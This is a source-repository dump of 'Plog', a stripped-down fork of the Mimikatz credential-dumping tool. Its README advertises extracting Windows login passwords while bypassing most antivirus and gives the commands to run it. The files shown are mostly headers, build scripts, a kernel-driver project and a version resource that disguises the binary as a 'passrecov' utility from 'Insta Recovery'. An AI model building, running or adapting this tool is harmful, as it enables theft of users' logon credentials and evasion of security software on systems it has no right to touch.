├── mimidrv ├── MAKEFILE ├── _rebuild_.cmd ├── mimidrv.rc ├── SOURCES ├── _clean_.cmd ├── kkll_m_filters.h ├── mimidrv.h ├── mimidrv.log ├── _build_.cmd ├── kkll_m_ssdt.h ├── kkll_m_modules.h ├── kkll_m_memory.h ├── kkll_m_process.h ├── mimidrv.vcxproj.filters ├── globals.h ├── kkll_m_notify.h ├── kkll_m_ssdt.c ├── mimidrv.vcxproj ├── kkll_m_modules.c ├── kkll_m_memory.c └── ioctl.h ├── trunk.lst ├── lib ├── x64 │ ├── hid.lib │ ├── bcrypt.lib │ ├── fltlib.lib │ ├── ncrypt.lib │ ├── samlib.lib │ ├── winsta.lib │ ├── cryptdll.lib │ ├── ntdll.min.lib │ ├── msasn1.min.lib │ ├── netapi32.min.lib │ └── advapi32.hash.lib ├── Win32 │ ├── hid.lib │ ├── bcrypt.lib │ ├── fltlib.lib │ ├── ncrypt.lib │ ├── samlib.lib │ ├── winsta.lib │ ├── cryptdll.lib │ ├── msasn1.min.lib │ ├── ntdll.min.lib │ ├── netapi32.min.lib │ └── advapi32.hash.lib └── arm64 │ ├── msasn1.min.lib │ ├── ntdll.min.lib │ ├── netapi32.min.lib │ └── advapi32.hash.lib ├── README.md ├── notrunk.lst ├── modules ├── kull_m_hid.c ├── rpc │ ├── kull_m_rpc_ms-bkrp.h │ ├── kull_m_rpc_ms-dcom_IObjectExporter.h │ ├── kull_m_rpc_bkrp.h │ ├── kull_m_rpc_mimicom.h │ ├── kull_m_rpc_ms-efsr.h │ ├── kull_m_rpc_ms-par.h │ ├── kull_m_rpc_ms-nrpc.h │ ├── kull_m_rpc_dpapi-entries.h │ ├── kull_m_rpc_bkrp.c │ ├── kull_m_rpc_ms-credentialkeys.h │ ├── kull_m_rpc_ms-credentialkeys.c │ ├── kull_m_rpc_ms-dcom_IObjectExporter_c.c │ ├── kull_m_rpc_ms-claims.h │ ├── kull_m_rpc.h │ └── kull_m_rpc_ms-rprn.h ├── kull_m_ldap.h ├── kull_m_pipe.h ├── kull_m_output.h ├── kull_m_cabinet.h ├── kull_m_xml.h ├── kull_m_kernel.h ├── kull_m_minidump.h ├── kull_m_crypto_remote.h ├── kull_m_service.h ├── kull_m_acr.h ├── kull_m_file.h ├── kull_m_ldap.c ├── kull_m_asn1.h ├── kull_m_crypto_sk.h ├── kull_m_remotelib.h ├── kull_m_token.h ├── kull_m_crypto_remote.c ├── kull_m_patch.h ├── kull_m_net.c ├── kull_m_crypto_ngc.h ├── kull_m_mifare.h ├── kull_m_kernel.c ├── kull_m_rdm.h ├── kull_m_handle.c ├── kull_m_sr98.h ├── kull_m_registry_structures.h ├── kull_m_output.c ├── kull_m_pipe.c ├── kull_m_registry.h ├── kull_m_asn1.c ├── kull_m_handle.h ├── kull_m_xml.c ├── kull_m_acr.c └── kull_m_hid.h ├── inc ├── schnlsp.h ├── PshPack8.h └── globals.h ├── plog ├── modules │ ├── sekurlsa │ │ ├── packages │ │ │ ├── kuhl_m_sekurlsa_wdigest.h │ │ │ ├── kuhl_m_sekurlsa_tspkg.h │ │ │ ├── kuhl_m_sekurlsa_tspkg.c │ │ │ ├── kuhl_m_sekurlsa_wdigest.c │ │ │ └── kuhl_m_sekurlsa_msv1_0.h │ │ ├── crypto │ │ │ ├── kuhl_m_sekurlsa_nt6.h │ │ │ └── kuhl_m_sekurlsa_nt5.h │ │ └── globals_sekurlsa.h │ ├── kuhl_m.h │ ├── dpapi │ │ ├── kuhl_m_dpapi.h │ │ ├── packages │ │ │ └── kuhl_m_dpapi_chrome.h │ │ └── kuhl_m_dpapi_oe.h │ ├── kuhl_m_standard.h │ ├── kuhl_m_privilege.h │ ├── kerberos │ │ ├── kuhl_m_kerberos.h │ │ └── kuhl_m_kerberos_ticket.h │ ├── kuhl_m_privilege.c │ └── kuhl_m_standard.c ├── passrecov.rc └── passrecov.h ├── appveyor.yml ├── mimicom.idl └── kiwi_passwords.yar /mimidrv/MAKEFILE: -------------------------------------------------------------------------------- 1 | !INCLUDE $(NTMAKEENV)\makefile.def 2 | -------------------------------------------------------------------------------- /trunk.lst: -------------------------------------------------------------------------------- 1 | .\Win32 2 | .\x64 3 | README.md 4 | kiwi_passwords.yar 5 | mimicom.idl -------------------------------------------------------------------------------- /lib/x64/hid.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GamehunterKaan/Plog/main/lib/x64/hid.lib -------------------------------------------------------------------------------- /lib/Win32/hid.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GamehunterKaan/Plog/main/lib/Win32/hid.lib -------------------------------------------------------------------------------- /lib/x64/bcrypt.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GamehunterKaan/Plog/main/lib/x64/bcrypt.lib -------------------------------------------------------------------------------- /lib/x64/fltlib.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GamehunterKaan/Plog/main/lib/x64/fltlib.lib -------------------------------------------------------------------------------- /lib/x64/ncrypt.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GamehunterKaan/Plog/main/lib/x64/ncrypt.lib -------------------------------------------------------------------------------- /lib/x64/samlib.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GamehunterKaan/Plog/main/lib/x64/samlib.lib -------------------------------------------------------------------------------- /lib/x64/winsta.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GamehunterKaan/Plog/main/lib/x64/winsta.lib -------------------------------------------------------------------------------- /mimidrv/_rebuild_.cmd: -------------------------------------------------------------------------------- 1 | @echo off 2 | call _clean_.cmd %1 "%2" 3 | call _build_.cmd %1 "%2" -------------------------------------------------------------------------------- /mimidrv/mimidrv.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GamehunterKaan/Plog/main/mimidrv/mimidrv.rc -------------------------------------------------------------------------------- /lib/Win32/bcrypt.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GamehunterKaan/Plog/main/lib/Win32/bcrypt.lib -------------------------------------------------------------------------------- /lib/Win32/fltlib.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GamehunterKaan/Plog/main/lib/Win32/fltlib.lib -------------------------------------------------------------------------------- /lib/Win32/ncrypt.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GamehunterKaan/Plog/main/lib/Win32/ncrypt.lib -------------------------------------------------------------------------------- /lib/Win32/samlib.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GamehunterKaan/Plog/main/lib/Win32/samlib.lib -------------------------------------------------------------------------------- /lib/Win32/winsta.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GamehunterKaan/Plog/main/lib/Win32/winsta.lib -------------------------------------------------------------------------------- /lib/x64/cryptdll.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GamehunterKaan/Plog/main/lib/x64/cryptdll.lib -------------------------------------------------------------------------------- /lib/x64/ntdll.min.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GamehunterKaan/Plog/main/lib/x64/ntdll.min.lib -------------------------------------------------------------------------------- /lib/Win32/cryptdll.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GamehunterKaan/Plog/main/lib/Win32/cryptdll.lib -------------------------------------------------------------------------------- /lib/Win32/msasn1.min.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GamehunterKaan/Plog/main/lib/Win32/msasn1.min.lib -------------------------------------------------------------------------------- /lib/Win32/ntdll.min.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GamehunterKaan/Plog/main/lib/Win32/ntdll.min.lib -------------------------------------------------------------------------------- /lib/arm64/msasn1.min.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GamehunterKaan/Plog/main/lib/arm64/msasn1.min.lib -------------------------------------------------------------------------------- /lib/arm64/ntdll.min.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GamehunterKaan/Plog/main/lib/arm64/ntdll.min.lib -------------------------------------------------------------------------------- /lib/x64/msasn1.min.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GamehunterKaan/Plog/main/lib/x64/msasn1.min.lib -------------------------------------------------------------------------------- /lib/x64/netapi32.min.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GamehunterKaan/Plog/main/lib/x64/netapi32.min.lib -------------------------------------------------------------------------------- /lib/Win32/netapi32.min.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GamehunterKaan/Plog/main/lib/Win32/netapi32.min.lib -------------------------------------------------------------------------------- /lib/arm64/netapi32.min.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GamehunterKaan/Plog/main/lib/arm64/netapi32.min.lib -------------------------------------------------------------------------------- /lib/x64/advapi32.hash.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GamehunterKaan/Plog/main/lib/x64/advapi32.hash.lib -------------------------------------------------------------------------------- /lib/Win32/advapi32.hash.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GamehunterKaan/Plog/main/lib/Win32/advapi32.hash.lib -------------------------------------------------------------------------------- /lib/arm64/advapi32.hash.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GamehunterKaan/Plog/main/lib/arm64/advapi32.hash.lib -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Plog 2 | A Mimikatz For Only Extracting Login Passwords.(Bypasses Most AV's) 3 | 4 | ```privilege::debug``` 5 | 6 | ```sekurlsa::Plog``` 7 | -------------------------------------------------------------------------------- /notrunk.lst: -------------------------------------------------------------------------------- 1 | *.obj 2 | *.lib 3 | *.exp 4 | *.kirbi 5 | *.log 6 | *.hiv 7 | *.key 8 | *.reg 9 | *.pfx 10 | *.cer 11 | *.pvk 12 | *.ndr 13 | *.der 14 | *.dmp -------------------------------------------------------------------------------- /modules/kull_m_hid.c: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #include "kull_m_hid.h" -------------------------------------------------------------------------------- /modules/rpc/kull_m_rpc_ms-bkrp.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "kull_m_rpc.h" 3 | 4 | const GUID BACKUPKEY_BACKUP_GUID, BACKUPKEY_RESTORE_GUID_WIN2K, BACKUPKEY_RETRIEVE_BACKUP_KEY_GUID, BACKUPKEY_RESTORE_GUID; 5 | 6 | NET_API_STATUS BackuprKey(handle_t h, GUID *pguidActionAgent, byte *pDataIn, DWORD cbDataIn, byte **ppDataOut, DWORD *pcbDataOut, DWORD dwParam); -------------------------------------------------------------------------------- /mimidrv/SOURCES: -------------------------------------------------------------------------------- 1 | TARGETNAME=mimidrv 2 | TARGETPATH=OBJ 3 | TARGETTYPE=DRIVER 4 | SOURCES=mimidrv.c \ 5 | mimidrv.rc \ 6 | kkll_m_process.c \ 7 | kkll_m_modules.c \ 8 | kkll_m_memory.c \ 9 | kkll_m_ssdt.c \ 10 | kkll_m_notify.c \ 11 | kkll_m_filters.c 12 | 13 | TARGETLIBS= $(TARGETLIBS) $(IFSKIT_LIB_PATH)\fltmgr.lib $(BASEDIR)\lib\wlh\*\aux_klib.lib $(DDK_LIB_PATH)\ntstrsafe.lib -------------------------------------------------------------------------------- /modules/kull_m_ldap.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "globals.h" 8 | #include 9 | #include 10 | #include "kull_m_string.h" 11 | 12 | BOOL kull_m_ldap_getLdapAndRootDN(PCWCHAR system, PCWCHAR nc, PLDAP *ld, PWCHAR *rootDn, PSEC_WINNT_AUTH_IDENTITY pIdentity); 13 | PWCHAR kull_m_ldap_getRootDomainNamingContext(PCWCHAR nc, LDAP *ld); -------------------------------------------------------------------------------- /modules/rpc/kull_m_rpc_ms-dcom_IObjectExporter.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "kull_m_rpc.h" 3 | 4 | typedef struct tagCOMVERSION { 5 | USHORT MajorVersion; 6 | USHORT MinorVersion; 7 | } COMVERSION; 8 | 9 | typedef struct tagDUALSTRINGARRAY { 10 | USHORT wNumEntries; 11 | USHORT wSecurityOffset; 12 | USHORT aStringArray[ANYSIZE_ARRAY]; 13 | } DUALSTRINGARRAY; 14 | 15 | error_status_t ServerAlive2(handle_t hRpc, COMVERSION *pComVersion, DUALSTRINGARRAY **ppdsaOrBindings, DWORD *pReserved); -------------------------------------------------------------------------------- /mimidrv/_clean_.cmd: -------------------------------------------------------------------------------- 1 | @echo off 2 | set mimidrv=%~dp0 3 | set path=%systemroot%;%systemroot%\system32 4 | 5 | set origplatform=%1 6 | set destination=%2 7 | 8 | if %origplatform%==Win32 ( 9 | set platform=x86 10 | set beginsource=x86 11 | set endsource=i386 12 | ) else ( 13 | set platform=x64 14 | set beginsource=amd64 15 | set endsource=amd64 16 | ) 17 | 18 | del /f /q /a %destination%\*.sys 19 | rd /s /q %mimidrv%\obj 20 | rd /s /q %mimidrv%\objfre_wnet_%beginsource% 21 | del /f /q /a %mimidrv%\buildfre_wnet_%beginsource%.log -------------------------------------------------------------------------------- /modules/kull_m_pipe.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "globals.h" 8 | 9 | BOOL kull_m_pipe_server(LPCWCHAR pipeName, HANDLE *phPipe); 10 | BOOL kull_m_pipe_server_connect(HANDLE hPipe); 11 | BOOL kull_m_pipe_client(LPCWCHAR pipeName, PHANDLE phPipe); 12 | BOOL kull_m_pipe_read(HANDLE hPipe, LPBYTE *buffer, DWORD *size); 13 | BOOL kull_m_pipe_write(HANDLE hPipe, LPCVOID buffer, DWORD size); 14 | BOOL kull_m_pipe_close(PHANDLE phPipe); -------------------------------------------------------------------------------- /mimidrv/kkll_m_filters.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "globals.h" 8 | #include "kkll_m_modules.h" 9 | 10 | typedef enum _KIWI_MF_INDEX { 11 | CallbackOffset = 0, 12 | CallbackPreOffset = 1, 13 | CallbackPostOffset = 2, 14 | CallbackVolumeNameOffset = 3, 15 | 16 | MF_MAX = 4, 17 | } KIWI_MF_INDEX, *PKIWI_MF_INDEX; 18 | 19 | NTSTATUS kkll_m_filters_list(PKIWI_BUFFER outBuffer); 20 | NTSTATUS kkll_m_minifilters_list(PKIWI_BUFFER outBuffer); -------------------------------------------------------------------------------- /modules/kull_m_output.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "globals.h" 8 | #include 9 | #include 10 | 11 | FILE * logfile; 12 | #if !defined(MIMIKATZ_W2000_SUPPORT) 13 | wchar_t * outputBuffer; 14 | size_t outputBufferElements, outputBufferElementsPosition; 15 | #endif 16 | 17 | void kprintf(PCWCHAR format, ...); 18 | void kprintf_inputline(PCWCHAR format, ...); 19 | 20 | BOOL kull_m_output_file(PCWCHAR file); 21 | 22 | void kull_m_output_init(); 23 | void kull_m_output_clean(); -------------------------------------------------------------------------------- /modules/kull_m_cabinet.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "globals.h" 8 | #include 9 | #include 10 | 11 | LPCSTR FCIErrorToString(FCIERROR err); 12 | 13 | typedef struct _KIWI_CABINET{ 14 | HFCI hfci; 15 | CCAB ccab; 16 | ERF erf; 17 | } KIWI_CABINET, *PKIWI_CABINET; 18 | 19 | PKIWI_CABINET kull_m_cabinet_create(LPSTR cabinetName); 20 | BOOL kull_m_cabinet_add(PKIWI_CABINET cab, LPSTR sourceFile, OPTIONAL LPSTR destFile); 21 | BOOL kull_m_cabinet_close(PKIWI_CABINET cab); 22 | -------------------------------------------------------------------------------- /inc/schnlsp.h: -------------------------------------------------------------------------------- 1 | //+--------------------------------------------------------------------------- 2 | // 3 | // Microsoft Windows 4 | // Copyright (C) Microsoft Corporation, 1992-1999. 5 | // 6 | // File: schnlsp.h 7 | // 8 | // Contents: Public Definitions for SCHANNEL Security Provider 9 | // 10 | // Classes: 11 | // 12 | // Functions: 13 | // 14 | //---------------------------------------------------------------------------- 15 | 16 | #ifndef __SCHNLSP_H__ 17 | #define __SCHNLSP_H__ 18 | 19 | #if _MSC_VER > 1000 20 | #pragma once 21 | #endif 22 | 23 | #include 24 | 25 | 26 | #endif //__SCHNLSP_H__ 27 | 28 | -------------------------------------------------------------------------------- /mimidrv/mimidrv.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "globals.h" 8 | #include "kkll_m_process.h" 9 | #include "kkll_m_modules.h" 10 | #include "kkll_m_ssdt.h" 11 | #include "kkll_m_notify.h" 12 | #include "kkll_m_filters.h" 13 | 14 | extern PSHORT NtBuildNumber; 15 | 16 | DRIVER_INITIALIZE DriverEntry; 17 | DRIVER_UNLOAD DriverUnload; 18 | 19 | DRIVER_DISPATCH UnSupported; 20 | __drv_dispatchType(IRP_MJ_DEVICE_CONTROL) DRIVER_DISPATCH MimiDispatchDeviceControl; 21 | 22 | KIWI_OS_INDEX getWindowsIndex(); -------------------------------------------------------------------------------- /mimidrv/mimidrv.log: -------------------------------------------------------------------------------- 1 | Build started 14.12.2021 13:17:23. 2 | 1>Project "D:\Folders\Documents\Plog\mimidrv\mimidrv.vcxproj" on node 3 (Rebuild target(s)). 3 | 1>Rebuild: 4 | _rebuild_.cmd x64 D:\Folders\Documents\Plog\x64\ 5 | Could Not Find D:\Folders\Documents\Plog\x64\*.sys 6 | Sistem belirtilen dosyayı bulamıyor. 7 | Could Not Find D:\Folders\Documents\Plog\mimidrv\buildfre_wnet_amd64.log 8 | No WDK found :( 9 | Sistem belirtilen dosyayı bulamıyor. 10 | 1>Done Building Project "D:\Folders\Documents\Plog\mimidrv\mimidrv.vcxproj" (Rebuild target(s)). 11 | 12 | Build succeeded. 13 | 14 | Time Elapsed 00:00:02.91 15 | -------------------------------------------------------------------------------- /modules/kull_m_xml.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "globals.h" 8 | #include 9 | #include "kull_m_string.h" 10 | 11 | IXMLDOMDocument * kull_m_xml_CreateAndInitDOM(); 12 | void kull_m_xml_ReleaseDom(IXMLDOMDocument *pDoc); 13 | 14 | BOOL kull_m_xml_LoadXMLFile(IXMLDOMDocument *pXMLDom, PCWSTR filename); 15 | BOOL kull_m_xml_SaveXMLFile(IXMLDOMDocument *pXMLDom, PCWSTR filename); 16 | 17 | wchar_t * kull_m_xml_getAttribute(IXMLDOMNode *pNode, PCWSTR name); 18 | wchar_t * kull_m_xml_getTextValue(IXMLDOMNode *pNode, PCWSTR name); -------------------------------------------------------------------------------- /mimidrv/_build_.cmd: -------------------------------------------------------------------------------- 1 | @echo off 2 | set winddk=%SystemDrive%\WinDDK\7600.16385.1 3 | 4 | set mimidrv=%~dp0 5 | set path=%systemroot%;%systemroot%\system32 6 | set origplatform=%1 7 | set destination=%2 8 | 9 | if %origplatform%==Win32 ( 10 | set platform=x86 11 | set beginsource=x86 12 | set endsource=i386 13 | ) else ( 14 | set platform=x64 15 | set beginsource=amd64 16 | set endsource=amd64 17 | ) 18 | 19 | if exist %winddk% ( 20 | call %winddk%\bin\setenv.bat %winddk%\ fre %platform% WNET no_oacr 21 | cd /d %mimidrv% 22 | build 23 | if errorlevel 0 (copy /y %mimidrv%\objfre_wnet_%beginsource%\%endsource%\*.sys %destination%) else echo Build failed :( 24 | ) else echo No WDK found :( 25 | 26 | rd /s /q %mimidrv%\obj 27 | rd /s /q %mimidrv%\%origplatform% -------------------------------------------------------------------------------- /plog/modules/sekurlsa/packages/kuhl_m_sekurlsa_wdigest.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "../kuhl_m_sekurlsa.h" 8 | 9 | KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_wdigest_package; 10 | 11 | NTSTATUS kuhl_m_sekurlsa_wdigest(int argc, wchar_t * argv[]); 12 | void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_wdigest(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData); 13 | 14 | typedef struct _KIWI_WDIGEST_LIST_ENTRY { 15 | struct _KIWI_WDIGEST_LIST_ENTRY *Flink; 16 | struct _KIWI_WDIGEST_LIST_ENTRY *Blink; 17 | ULONG UsageCount; 18 | struct _KIWI_WDIGEST_LIST_ENTRY *This; 19 | LUID LocallyUniqueIdentifier; 20 | } KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY; -------------------------------------------------------------------------------- /plog/modules/kuhl_m.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "globals.h" 8 | 9 | typedef NTSTATUS (* PKUHL_M_C_FUNC) (int argc, wchar_t * args[]); 10 | typedef NTSTATUS (* PKUHL_M_C_FUNC_INIT) (); 11 | 12 | typedef struct _KUHL_M_C { 13 | const PKUHL_M_C_FUNC pCommand; 14 | const wchar_t * command; 15 | const wchar_t * description; 16 | } KUHL_M_C, *PKUHL_M_C; 17 | 18 | typedef struct _KUHL_M { 19 | const wchar_t * shortName; 20 | const wchar_t * fullName; 21 | const wchar_t * description; 22 | const unsigned short nbCommands; 23 | const KUHL_M_C * commands; 24 | const PKUHL_M_C_FUNC_INIT pInit; 25 | const PKUHL_M_C_FUNC_INIT pClean; 26 | } KUHL_M, *PKUHL_M; 27 | -------------------------------------------------------------------------------- /modules/kull_m_kernel.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "globals.h" 8 | #include 9 | #include "../mimidrv/ioctl.h" 10 | 11 | BOOL kull_m_kernel_ioctl_handle(HANDLE hDriver, DWORD ioctlCode, PVOID bufferIn, DWORD szBufferIn, PVOID * pBufferOut, PDWORD pSzBufferOut, BOOL autobuffer); 12 | BOOL kull_m_kernel_ioctl(PCWSTR driver, DWORD ioctlCode, PVOID bufferIn, DWORD szBufferIn, PVOID * pBufferOut, PDWORD pSzBufferOut, BOOL autobuffer); 13 | BOOL kull_m_kernel_mimidrv_ioctl(DWORD ioctlCode, PVOID bufferIn, DWORD szBufferIn, PVOID * pBufferOut, PDWORD pSzBufferOut, BOOL autobuffer); 14 | BOOL kull_m_kernel_mimidrv_simple_output(DWORD ioctlCode, PVOID bufferIn, DWORD szBufferIn); -------------------------------------------------------------------------------- /modules/rpc/kull_m_rpc_bkrp.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "globals.h" 8 | #include "kull_m_rpc_ms-bkrp.h" 9 | #include "../kull_m_net.h" 10 | 11 | BOOL kull_m_rpc_bkrp_createBinding(LPCWSTR NetworkAddr, RPC_BINDING_HANDLE *hBinding); 12 | 13 | BOOL kull_m_rpc_bkrp_generic(LPCWSTR NetworkAddr, const GUID * pGuid, PVOID DataIn, DWORD dwDataIn, PVOID *pDataOut, DWORD *pdwDataOut); 14 | 15 | BOOL kull_m_rpc_bkrp_Restore(LPCWSTR NetworkAddr, PVOID DataIn, DWORD dwDataIn, PVOID *pDataOut, DWORD *pdwDataOut); 16 | BOOL kull_m_rpc_bkrp_Backup(LPCWSTR NetworkAddr, PVOID DataIn, DWORD dwDataIn, PVOID *pDataOut, DWORD *pdwDataOut); 17 | BOOL kull_m_rpc_bkrp_BackupKey(LPCWSTR NetworkAddr, PVOID *pDataOut, DWORD *pdwDataOut); -------------------------------------------------------------------------------- /mimidrv/kkll_m_ssdt.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "globals.h" 8 | #include "kkll_m_modules.h" 9 | #include "kkll_m_memory.h" 10 | 11 | typedef struct _SERVICE_DESCRIPTOR_TABLE { 12 | #if defined(_M_IX86) 13 | PVOID *ServiceTable; 14 | #elif defined(_M_X64) 15 | LONG *OffsetToService; 16 | #endif 17 | PULONG CounterTable; 18 | ULONG TableSize; 19 | PUCHAR ArgumentTable; 20 | } SERVICE_DESCRIPTOR_TABLE, *PSERVICE_DESCRIPTOR_TABLE; 21 | 22 | #if defined(_M_IX86) 23 | extern PSERVICE_DESCRIPTOR_TABLE KeServiceDescriptorTable; 24 | #elif defined(_M_X64) 25 | PSERVICE_DESCRIPTOR_TABLE KeServiceDescriptorTable; 26 | NTSTATUS kkll_m_ssdt_getKeServiceDescriptorTable(); 27 | #endif 28 | 29 | NTSTATUS kkll_m_ssdt_list(PKIWI_BUFFER outBuffer); -------------------------------------------------------------------------------- /plog/passrecov.rc: -------------------------------------------------------------------------------- 1 | #include 2 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US 3 | 4 | VS_VERSION_INFO VERSIONINFO 5 | 6 | FILEVERSION 3,2,5,0 7 | PRODUCTVERSION 3,2,5,0 8 | FILEFLAGS VS_FF_PRERELEASE|VS_FF_SPECIALBUILD|VS_FF_PRIVATEBUILD 9 | FILEFLAGSMASK VS_FFI_FILEFLAGSMASK 10 | FILEOS VOS_NT 11 | FILETYPE VFT_APP 12 | BEGIN 13 | BLOCK "StringFileInfo" 14 | BEGIN 15 | BLOCK "040904b0" 16 | BEGIN 17 | VALUE "ProductName", "passrecov" 18 | VALUE "ProductVersion", "3.2.5.0" 19 | VALUE "CompanyName", "Insta Recovery" 20 | VALUE "FileDescription", "passrecov for Windows" 21 | VALUE "FileVersion", "3.2.5.0" 22 | VALUE "InternalName", "passrecov" 23 | VALUE "LegalCopyright", "Copyright (c) 2019 - 2021" 24 | VALUE "OriginalFilename", "passrecov.exe" 25 | VALUE "PrivateBuild", "" 26 | VALUE "SpecialBuild", "" 27 | END 28 | END 29 | BLOCK "VarFileInfo" 30 | BEGIN 31 | VALUE "Translation", 0x0409, 1200 32 | END 33 | END -------------------------------------------------------------------------------- /appveyor.yml: -------------------------------------------------------------------------------- 1 | version: 2.2.0-ci-{branch}-{build} 2 | image: Visual Studio 2013 3 | configuration: Release 4 | platform: 5 | - x64 6 | - Win32 7 | shallow_clone: true 8 | build: 9 | parallel: true 10 | verbosity: normal 11 | after_build: 12 | - cmd: >- 13 | 7z a -t7z -mx -ms=on %APPVEYOR_PROJECT_NAME%_trunk_%PLATFORM%.7z -xr@notrunk.lst .\%PLATFORM% README.md kiwi_passwords.yar mimicom.idl 14 | 15 | 7z a -tzip -mx -mm=deflate -mpass=15 %APPVEYOR_PROJECT_NAME%_trunk_%PLATFORM%.zip -xr@notrunk.lst .\%PLATFORM% README.md kiwi_passwords.yar mimicom.idl 16 | 17 | 7z a -p%APPVEYOR_PROJECT_NAME% -mhe=on -t7z -mx -ms=on %APPVEYOR_PROJECT_NAME%_trunk_password_%PLATFORM%.7z -xr@notrunk.lst .\%PLATFORM% README.md kiwi_passwords.yar mimicom.idl 18 | 19 | 7z a -p%APPVEYOR_PROJECT_NAME% -tzip -mx -mm=deflate -mpass=15 %APPVEYOR_PROJECT_NAME%_trunk_password_%PLATFORM%.zip -xr@notrunk.lst .\%PLATFORM% README.md kiwi_passwords.yar mimicom.idl 20 | artifacts: 21 | - path: mimikatz_trunk_* -------------------------------------------------------------------------------- /modules/kull_m_minidump.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "globals.h" 8 | #include 9 | 10 | typedef struct _KULL_M_MINIDUMP_HANDLE { 11 | HANDLE hFileMapping; 12 | LPVOID pMapViewOfFile; 13 | } KULL_M_MINIDUMP_HANDLE, *PKULL_M_MINIDUMP_HANDLE; 14 | 15 | BOOL kull_m_minidump_open(IN HANDLE hFile, OUT PKULL_M_MINIDUMP_HANDLE *hMinidump); 16 | BOOL kull_m_minidump_close(IN 